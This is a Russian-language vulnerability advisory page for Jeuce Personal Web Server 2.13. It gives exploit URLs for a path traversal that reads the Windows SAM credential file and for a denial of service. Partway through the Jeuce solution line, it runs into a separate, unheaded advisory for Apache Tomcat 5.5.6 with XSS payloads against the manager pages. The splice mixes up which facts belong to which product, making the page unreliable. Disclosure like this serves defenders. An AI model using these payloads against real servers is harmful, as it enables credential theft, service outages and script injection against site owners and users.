Просмотр произвольных файлов и отказ в обслуживании в Jeuce Personal Web Server

Дата публикации:
09.01.2005
Всего просмотров:
1249
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-1661
CVE-2005-1662
CVE-2005-1663
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
Раскрытие важных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Jeuce Personal Web Server 2.x
Уязвимые версии: Jeuce Personal Web Server 2.13

Описание: Уязвимость в Jeuce Personal Web Server позволяет удаленному пользователю просматривать произвольные файлы на целевой системе или аварийно завершить работу Web сервера.

1. Просмотр файлов:

http://[target]/../winnt/repair/sam
2. DoS:
http://[target]/://

URL производителя:www.jeuce.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Программа: Apache Jakarta Tomact 5.5.6

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость в Apache Jakarta Tomact позволяет удаленному пользователю выполнить XSS нападение.

Пример/Эксплоит:

http://[target]:8080/manager/html/<script>alert("Hallo")</script>
http://[target]:8080/manager/html/stop ?path=<script>alert("Hallo")</script>
http://[target]:8080/manager/html/start?path=<script>alert("Hallo")</script>

URL производителя: jakarta.apache.org/tomcat/

Решение:Установите патч (см. источник)

Ссылки: Jeuce Personal Web Server

или введите имя

CAPTCHA